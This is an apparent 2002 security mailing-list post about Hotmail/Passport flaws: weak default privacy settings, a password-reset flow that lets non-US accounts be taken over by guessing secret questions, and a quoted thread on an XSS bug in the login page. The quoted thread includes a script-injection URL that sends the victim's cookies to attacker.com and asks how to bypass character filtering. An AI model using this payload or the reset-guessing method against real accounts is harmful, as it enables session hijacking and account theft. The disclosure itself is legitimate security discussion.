Hi Everyone, MSN passport (read Microsoft)'s basic mentality itself about security is very insecure. In November 2001 and april 2002, when some security bugs were mentioned, MSN did patch some of their systems. But surprisingly, we found many of the systems still used the buggy techniques, say, Javascript, within their own pages. Even as today, when one opens MSN Hotmail in IE6, it many a times says Script Error (or something similar). Can't they make their own mail system compatible with their own Browser? Other issues we observed but kept silent were: a) When MS transitioned from MS hotmail to MSN hotmail, they reset all users' options to somewhat insecure settings. I am unaware if any warning or alert was sent before doing so. The settings affected were (still are, and maybe are default settings for new accounts): (Under Personal Profile...) 1. Share my e-mail address. 2. Share my first and last names. 3. Share my other registration information. The above three options are enabled by default. I assume that these maybe a prime source of leaking informatin to spammers, besides other security risks. If you have these options enabled, Disable them NOW! (Under Other Options...) 4. Session Expiration is set to NEVER. Probably, if session expiration is set to the minimum available 2 hours, chances of others getting into your hotmail accounts become less. B) The change password policy: Hotmails Reset Password option can be used by any user, as long as the account holder is not in the US, that is, his/her location is not set at US. This is because when the "forgot password" option is invoked (and a secret question is present in the database), the next step asks for the username and country. If the country is not US, then a third field, ZIP CODE is skipped and the secret question page is shown. Of course one has to know the answer to the question but then, MS has provided enough freedom to users to type in any question they like. During our research, we found questions like "How are you?" and "Whom do you love most?". Anyone's guess, we found answers to be like "Fine" (or "Bad" or "Not Good") and "me" ("or myself" or "my lover") respectively. The answers in brackets are the next-possible-answers but we could guess, at the most, in second attempt only. Time to change hotmail policies?? With warms regards and best wishes. Inderjeet S Sodhi Infotech Consultant, E-Security and S/W Solution Provider, Web Designer and Beta Tester. ----- Original Message ----- From: "Russell Harding" <hardingr@cunap.com> To: "Thor Larholm" <Thor@jubii.dk> Sent: Tuesday, October 08, 2002 12:20 PM Subject: RE: XSS bug in hotmail login page > Hello, comments below: > > On Mon, 7 Oct 2002, Thor Larholm wrote: > > > It's very simple, you can inject arbitrary scripting to be executed by the > > user in the context of hotmail. This means that you can e.g. steal his > > cookies or, if he's logged in, write emails from his account, delete his > > mails and change his password. > > > > I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's > from GET requests. While you can view your own cookies easily, I'm not > sure if you can still exploit this bug. I do know filtering these > characters prevents this sort of attack: > > http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb="><sc ript>document.location.replace('http://attacker.com/steal.cgi?'+document.coo kie);</script>&ct=1033054530&_setlang= > > Is there another way to exploit this which I am not seeing? Or does MSN > actually have their act together (in this particular case...)? > > -Russell > > P.S. Well, I suppose the real question may be this: > Is there a way to concatenate javascript strings without "+" or "%2B"? > > > > On Mon, 7 Oct 2002, Thor Larholm wrote: > > > > From: Peter Rdam [mailto:hell@weedmail.com] > > > They didnt reacted, and im pretty curious about what > > > is possible with the bug. And i actually hope that > > > someone can tell me about it and maybe Microsoft will > > > do something about it.. > > > > It's very simple, you can inject arbitrary scripting to be executed by the > > user in the context of hotmail. This means that you can e.g. steal his > > cookies or, if he's logged in, write emails from his account, delete his > > mails and change his password. > > > > > > > > Regards > > Thor Larholm > > Jubii A/S - Internet Programmer > > >